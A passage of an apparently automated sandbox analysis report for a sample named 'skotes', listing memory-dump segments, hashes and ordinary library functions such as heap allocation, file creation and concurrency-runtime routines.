                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                              • Opcode ID: e90c3c68fccd56432ad74f1d09ad78c9aa3dc8d94c6bbb41a56103a8a651f705
                                                                                                                                              • Instruction ID: 98eadcf290edf2217396f0d342befbee2ed41839c936de3a1171de8bd0755ccb
                                                                                                                                              • Opcode Fuzzy Hash: e90c3c68fccd56432ad74f1d09ad78c9aa3dc8d94c6bbb41a56103a8a651f705
                                                                                                                                              • Instruction Fuzzy Hash: 29F05932D0112066EB283A33BC01A1B37599F4D770F25B027FC24A7280DA28FC0185E9
                                                                                                                                              Function 0043B04B Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,EBA58D57,?,?,0041D3FC,EBA58D57,?,00417A8B,?,?,?,?,?,?,00407465,?), ref: 0043B07E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                              • Opcode ID: d3e579016960f99e7d79f40e1f5ad570ce8be35f6e5b82e7819322212163e863
                                                                                                                                              • Instruction ID: 3ea9c3d718554331966b1561a36c418539583e8fe2488c62c8fcceb8a8c22db2
                                                                                                                                              • Opcode Fuzzy Hash: d3e579016960f99e7d79f40e1f5ad570ce8be35f6e5b82e7819322212163e863
                                                                                                                                              • Instruction Fuzzy Hash: EAE0E53110121196E73432265C02B5FB668CB4D3A0F053213EFE4D2290EB58CC0081ED
                                                                                                                                              Function 00441775 Relevance: 1.5, APIs: 1, Instructions: 16fileCOMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CreateFileW.KERNEL32(00000000,00000000,?,00441B65,?,?,00000000,?,00441B65,00000000,0000000C), ref: 00441792
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                              • Opcode ID: a5753d576fc6fae96490bd3c9ae104ec3c996effb63c681812c4d41ae9142aa4
                                                                                                                                              • Instruction ID: fa30254bc092aafc69782497edfd86da6affdf9f63b9c805fd920c0f8d32bd5a
                                                                                                                                              • Opcode Fuzzy Hash: a5753d576fc6fae96490bd3c9ae104ec3c996effb63c681812c4d41ae9142aa4
                                                                                                                                              • Instruction Fuzzy Hash: AAD0923204110DBBDF129E85DC02EDA3BAAFB48754F014140BE1866020C736E831AB94

                                                                                                                                              Non-executed Functions

                                                                                                                                              Function 00420E13 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 284COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00420F16
                                                                                                                                              • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00420F62
                                                                                                                                                • Part of subcall function 0042265D: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 00422750
                                                                                                                                              • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00420FCE
                                                                                                                                              • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00420FEA
                                                                                                                                              • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0042103E
                                                                                                                                              • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0042106B
                                                                                                                                              • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 004210C1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
                                                                                                                                              • String ID: (
                                                                                                                                              • API String ID: 2943730970-3887548279
                                                                                                                                              • Opcode ID: 425fb8cfbc370ada9ec3cceb94e7cd75aa984255e83a46ff21e6ba2db1915851
                                                                                                                                              • Instruction ID: d8c2f6391a379bc46cf5e5d5dc6ad3851f43131c5326ae158e38cbfcee68216d
                                                                                                                                              • Opcode Fuzzy Hash: 425fb8cfbc370ada9ec3cceb94e7cd75aa984255e83a46ff21e6ba2db1915851
                                                                                                                                              • Instruction Fuzzy Hash: 89B18BB0A00625EFCB28CF58E980A7AB7F4FF48700F51416EE905AB751D374A981CB99
                                                                                                                                              Function 00421602 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00422CFC: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00422D0F
                                                                                                                                              • Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 00421614
                                                                                                                                                • Part of subcall function 00422E0F: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 00422E39
                                                                                                                                                • Part of subcall function 00422E0F: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 00422EA8
                                                                                                                                              • Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 00421746
                                                                                                                                              • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 004217A6
                                                                                                                                              • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 004217B2
                                                                                                                                              • Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 004217ED
                                                                                                                                              • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 0042180E
                                                                                                                                              • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 0042181A
                                                                                                                                              • Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 00421823
                                                                                                                                              • Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 0042183B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
